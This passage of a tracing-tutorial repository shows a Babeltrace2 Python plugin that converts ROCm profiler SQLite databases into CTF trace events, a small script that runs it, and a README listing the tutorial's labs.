103 | "COPY": "async_copy", 104 | "HSA": "hsa_api", 105 | "HIP": "hip_api", 106 | "KFD": "kfd_api", 107 | "rocTX": "roctx" 108 | } 109 | event_types = { 110 | "compute_kernels_hsa": { 111 | "get_row_func": get_compute_kernel_hsa_row, 112 | "fields": { 113 | "kernel_name" : "string", 114 | "gpu_id": "unsigned_integer", 115 | "queue_id": "unsigned_integer", 116 | "kernel_dispatch_id": "unsigned_integer", 117 | "pid": "unsigned_integer", 118 | "tid": "unsigned_integer", 119 | "grd": "unsigned_integer", 120 | "wgr": "unsigned_integer", 121 | "lds": "unsigned_integer", 122 | "scr": "unsigned_integer", 123 | "vgpr": "unsigned_integer", 124 | "sgpr": "unsigned_integer", 125 | "fbar": "unsigned_integer", 126 | "sig": "string", 127 | "obj": "string", 128 | "dipatch_time": "unsigned_integer", 129 | "complete_time": "unsigned_integer", 130 | } 131 | }, 132 | "hcc_ops": { 133 | "get_row_func": get_hcc_ops_row, 134 | "fields": { 135 | "name": "string", 136 | "queue_id": "unsigned_integer", 137 | "tid": "unsigned_integer", 138 | "pid": "unsigned_integer", 139 | "stream_id": "unsigned_integer", 140 | "index": "unsigned_integer", 141 | } 142 | }, 143 | "async_copy": { 144 | "get_row_func": get_async_copy_row, 145 | "fields": { 146 | "pid": "unsigned_integer", 147 | "name": "string", 148 | "index": "unsigned_integer", 149 | } 150 | }, 151 | "hsa_api": { 152 | "get_row_func": get_api_row, 153 | "fields": { 154 | "tid": "unsigned_integer", 155 | "name": "string", 156 | "args": "string", 157 | "index": "unsigned_integer", 158 | } 159 | }, 160 | "hip_api": { 161 | "get_row_func": get_api_row, 162 | "fields": { 163 | "tid": "unsigned_integer", 164 | "name": "string", 165 | "args": "string", 166 | "index": "unsigned_integer", 167 | } 168 | }, 169 | "kfd_api": { 170 | "get_row_func": get_api_row, 171 | "fields": { 172 | "tid": "unsigned_integer", 173 | "name": "string", 174 | "args": "string", 175 | "index": "unsigned_integer", 176 | } 177 | }, 178 | "roctx": { 179 | "get_row_func": get_roctx_row, 180 | "fields": { 181 | "pid": "unsigned_integer", 182 | "tid": "unsigned_integer", 183 | "name": "string", 184 | } 185 | }, 186 | } 187 | 188 | 189 | def connect_to_db(input_db): 190 | if os.path.isfile(input_db) and input_db[-3:] == ".db": 191 | connection = sqlite3.connect(input_db) 192 | return connection 193 | return None 194 | 195 | 196 | def detect_input_table(connection): 197 | cursor_tables = connection.cursor() 198 | cursor_tables.execute("SELECT name FROM sqlite_master WHERE type='table';") 199 | event_types_detected = {} 200 | for table in cursor_tables: 201 | row_count = connection.execute("SELECT COUNT(*) FROM " + table[0]).fetchone() 202 | if row_count[0] > 0: 203 | event_type = table_name_to_event_type[table[0]] 204 | event_types_detected[event_type] = { 205 | **event_types[event_type], 206 | "table_input": table[0] 207 | } 208 | return event_types_detected 209 | 210 | 211 | def get_payload_class(event_type, trace_class, payload_class): 212 | for field in event_type["fields"]: 213 | if event_type["fields"][field] == "string": 214 | payload_class += [(field, trace_class.create_string_field_class())] 215 | elif event_type["fields"][field] == "unsigned_integer": 216 | payload_class += [(field, trace_class.create_unsigned_integer_field_class())] 217 | if "added_fields" not in event_type: return 218 | for field in event_type["added_fields"]: 219 | payload_class += [(field, trace_class.create_unsigned_integer_field_class())] 220 | 221 | 222 | def add_optional_fields(connection, event_type): 223 | cursor = 
connection.cursor() 224 | cursor.execute("PRAGMA table_info({})".format(event_type["table_input"])) 225 | blacklist = [ 226 | *event_type["fields"].keys(), "Index", "KernelName", "gpu-id", "queue-id", "queue-index", 227 | "DispatchNs", "BeginNs", "EndNs","CompleteNs","DurationNs" 228 | ] 229 | event_type["added_fields"] = {} 230 | for row in cursor: 231 | if row[1] not in blacklist: 232 | event_type["added_fields"][row[1]] = "unsigned_integer" 233 | return event_type 234 | 235 | 236 | class RocmAPIMessageIterator(bt2._UserMessageIterator): 237 | def __init__(self, config, self_output_port): 238 | self._trace = self_output_port.user_data["trace"] 239 | self._event_type = self_output_port.user_data["event_type"] 240 | self._connection = self_output_port.user_data["connection"] 241 | 242 | # Initializes the data objects for trace parsing 243 | self._stream = self._trace.create_stream(self._event_type["stream_class"]) 244 | self._connection.row_factory = sqlite3.Row 245 | self._table_cursor = self._connection.execute("SELECT * FROM {} ORDER BY BeginNs;".format(self._event_type["table_input"])) 246 | 247 | # Because events are stored in a begin:end fashion, some end events occur after the 248 | # start of the next event. We store the event messages to keep the events ordered 249 | self._buffer = [] 250 | self._size_buffer = 30 251 | self._insert_buffer_begin_end() 252 | # heappush and heappop will compare against the first element of the tuple. In this case, 253 | # this element is the timestamp. However, when the timestamps are equal, it will compare against 254 | # the second element, so to manage this case, we put a counter. 255 | self._integer = 0 256 | 257 | def _insert_buffer_begin_end(self): 258 | heappush( 259 | self._buffer, 260 | (0, 0, self._create_stream_beginning_message(self._stream)) 261 | ) 262 | heappush( 263 | self._buffer, 264 | (sys.maxsize, sys.maxsize, self._create_stream_end_message(self._stream)) 265 | ) 266 | 267 | def _process_row(self, row): 268 | # Parsing the line to get payload and timestamp information 269 | if "added_fields" in self._event_type: 270 | (time_begin, time_end, fields) = self._event_type["get_row_func"](row, self._event_type["added_fields"]) 271 | else: 272 | (time_begin, time_end, fields) = self._event_type["get_row_func"](row) 273 | # Create event message 274 | def fill_and_push_msg(timestamp, fields, name_suffix): 275 | msg = self._create_event_message( 276 | self._event_type["event_class"], 277 | self._stream, 278 | default_clock_snapshot=timestamp 279 | ) 280 | for field in fields: 281 | if field == "name": 282 | msg.event.payload_field[field] = fields[field] + name_suffix 283 | else: 284 | msg.event.payload_field[field] = fields[field] 285 | heappush(self._buffer, (timestamp, self._integer, msg)) 286 | self._integer += 1 287 | # Separate begin and end: enter/exit 288 | fill_and_push_msg(time_begin, fields, "_enter") 289 | # Some events have no end time 290 | if time_end >= 0: 291 | fill_and_push_msg(time_end, fields, "_exit") 292 | 293 | def __next__(self): 294 | # Reading from the current event type table if the queue buffer is empty 295 | try: 296 | # Fill the buffer to its capacity 297 | while len(self._buffer) < self._size_buffer: 298 | row = next(self._table_cursor) 299 | self._process_row(row) 300 | msg_send = heappop(self._buffer)[2] 301 | return msg_send 302 | except StopIteration: 303 | # Empty buffer 304 | while len(self._buffer) > 0: 305 | msg_send = heappop(self._buffer)[2] 306 | return msg_send 307 | self._table_cursor.close() 308 
| raise StopIteration 309 | 310 | 311 | @bt2.plugin_component_class 312 | class RocmSource(bt2._UserSourceComponent, message_iterator_class=RocmAPIMessageIterator): 313 | def __init__(self, config, params, obj): 314 | # Checks what types of event are available 315 | self.connection = connect_to_db(str(params["input"])) 316 | if self.connection is None: 317 | raise Exception("Trace input not supported: {}".format(params["input"])) 318 | event_types_available = detect_input_table(self.connection) 319 | 320 | # Add performance counter to the list of fields of compute_kernels_hsa 321 | if "compute_kernels_hsa" in event_types_available: 322 | event_types_available["compute_kernels_hsa"] = add_optional_fields( 323 | self.connection, event_types_available["compute_kernels_hsa"]) 324 | 325 | # Initiliazes the metadata objects of the trace 326 | rocm_trace = self._create_trace_class() 327 | # Initializes the clock 328 | frequency = 1000000000 329 | offset = time.time() - time.clock_gettime(time.CLOCK_MONOTONIC) 330 | offset_seconds = int(offset) 331 | offset_cycles = int((offset - offset_seconds) * frequency) 332 | clock_class = self._create_clock_class( 333 | name="rocm_monotonic", 334 | frequency=frequency, # 1 GHz 335 | precision=1, # Nanosecond precision 336 | offset=bt2.ClockClassOffset(offset_seconds, offset_cycles), 337 | origin_is_unix_epoch=True, 338 | uuid=uuid.uuid4() 339 | ) 340 | for event_type in event_types_available: 341 | # Stream classes 342 | event_types_available[event_type]["stream_class"] = ( 343 | rocm_trace.create_stream_class(default_clock_class=clock_class) 344 | ) 345 | # Field classes 346 | payload_class = rocm_trace.create_structure_field_class() 347 | event_types_available[event_type]["payload_class"] = payload_class 348 | get_payload_class(event_types_available[event_type], rocm_trace, payload_class) 349 | # Event classes 350 | event_types_available[event_type]["event_class"] = ( 351 | event_types_available[event_type]["stream_class"].create_event_class( 352 | name=event_type, 353 | payload_field_class=event_types_available[event_type]["payload_class"]) 354 | ) 355 | # Same trace object for all ports 356 | trace = rocm_trace(environment={ "tracer_name": "roctracer" }) 357 | for event_type in event_types_available: 358 | self._add_output_port( 359 | "out_" + event_type, 360 | { 361 | "trace": trace, 362 | "event_type": event_types_available[event_type], 363 | "connection": self.connection 364 | } 365 | ) 366 | 367 | def _user_finalize(self): 368 | self.connection.close() 369 | 370 | 371 | bt2.register_plugin( 372 | __name__, 373 | "rocm", 374 | description="rocprofiler/roctracer format", 375 | author="Arnaud Fiorini" 376 | ) 377 | -------------------------------------------------------------------------------- /labs/304-rocm-traces/scripts/ctftrace.py: -------------------------------------------------------------------------------- 1 | import bt2 2 | import bt_plugin_rocm 3 | import os 4 | import pathlib 5 | import sys 6 | from datetime import datetime 7 | 8 | 9 | def translate_to_ctf(input_db, output): 10 | graph = bt2.Graph() 11 | 12 | plugin_path = os.path.join(pathlib.Path(__file__).parent, "bt_plugin_rocm.py") 13 | rocm_plugin = bt2.find_plugins_in_path(plugin_path, fail_on_load_error=True)[0] 14 | source_component = graph.add_component( 15 | rocm_plugin.source_component_classes["RocmSource"], 16 | "rocm_source", 17 | { "input": input_db } 18 | ) 19 | 20 | ctf_plugin = bt2.find_plugin("ctf").sink_component_classes["fs"] 21 | sink_component = graph.add_component( 
22 | ctf_plugin, 23 | "ctf_sink", 24 | { "path": output, "assume-single-trace": True } 25 | ) 26 | 27 | utils_plugin = bt2.find_plugin("utils").filter_component_classes["muxer"] 28 | muxer_component = graph.add_component( 29 | utils_plugin, 30 | "muxer" 31 | ) 32 | 33 | for i, port in enumerate(source_component.output_ports): 34 | graph.connect_ports( 35 | source_component.output_ports[port], 36 | muxer_component.input_ports["in{}".format(i)] 37 | ) 38 | 39 | graph.connect_ports( 40 | muxer_component.output_ports["out"], 41 | sink_component.input_ports["in"] 42 | ) 43 | 44 | graph.run() 45 | 46 | 47 | if __name__ == "__main__": 48 | if len(sys.argv) != 2: 49 | raise Exception("Usage: " + sys.argv[0] + " ") 50 | # Generate trace name as a folder named .YYYYMMDD-hhmmss 51 | trace_name = ".".join(sys.argv[1].split(".")[:-1]) + "." + datetime.now().strftime("%Y%m%d-%H%M%S") 52 | translate_to_ctf(sys.argv[1], trace_name) 53 | -------------------------------------------------------------------------------- /labs/README.md: -------------------------------------------------------------------------------- 1 | ## Instructions 2 | 3 | This directory contains the labs that are part of this tutorial. The labs are organized into categories and can be identified by their prefix code as follows: 4 | 5 | | Prefix Code | Lab Summary | 6 | | --- | --- | 7 | | **0xx** | Environment preparation and simple kernel trace collection | 8 | | **1xx** | Kernel trace analysis (system tracing) | 9 | | **2xx** | Simple userspace use cases (application tracing) [along with kernel] | 10 | | **3xx** | Advanced use cases (multi-machine and distributed traces) | 11 | 12 | ## Expected Lab Flow 13 | 14 | Each lab contains instructions on how to obtain a trace, so if you have the infrastructure available, you can get a trace yourself for the lab. But we also provide an [archive](TraceCompassTutorialTraces.tgz) with demo traces for all the labs, so you can import it into Trace Compass at the beginning and open the traces when necessary. 15 | 16 | 17 | * [001 what-is-tracing](001-what-is-tracing) 18 | * `optional` [002 install-lttng-on-ubuntu](002-install-lttng-on-ubuntu) 19 | * `optional` [003 record-kernel-trace-lttng](003-record-kernel-trace-lttng) 20 | * `optional` [004 record-kernel-trace-ftrace](004-record-kernel-trace-ftrace) 21 | * `optional` [005 record-kernel-trace-perf](005-record-kernel-trace-perf) 22 | * [006 installing-tracecompass](006-installing-tracecompass) 23 | * [101 analyze-system-tracing-in-tracecompass](101-analyze-system-trace-in-tracecompass) 24 | * [102 tracing-wget-critical-path](102-tracing-wget-critical-path) 25 | * [103 compare-package-managers](103-compare-package-managers) 26 | * [201 lttng-userspace-tracing](201-lttng-userspace-tracing) 27 | * [202 bug-hunt](202-bug-hunt) 28 | * [301 tracing-multiple-machines](301-tracing-multiple-machines) 29 | * [302 system-tracing-containers](302-system-tracing-containers) 30 | -------------------------------------------------------------------------------- /labs/TraceCompassTutorialTraces.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/TraceCompassTutorialTraces.tgz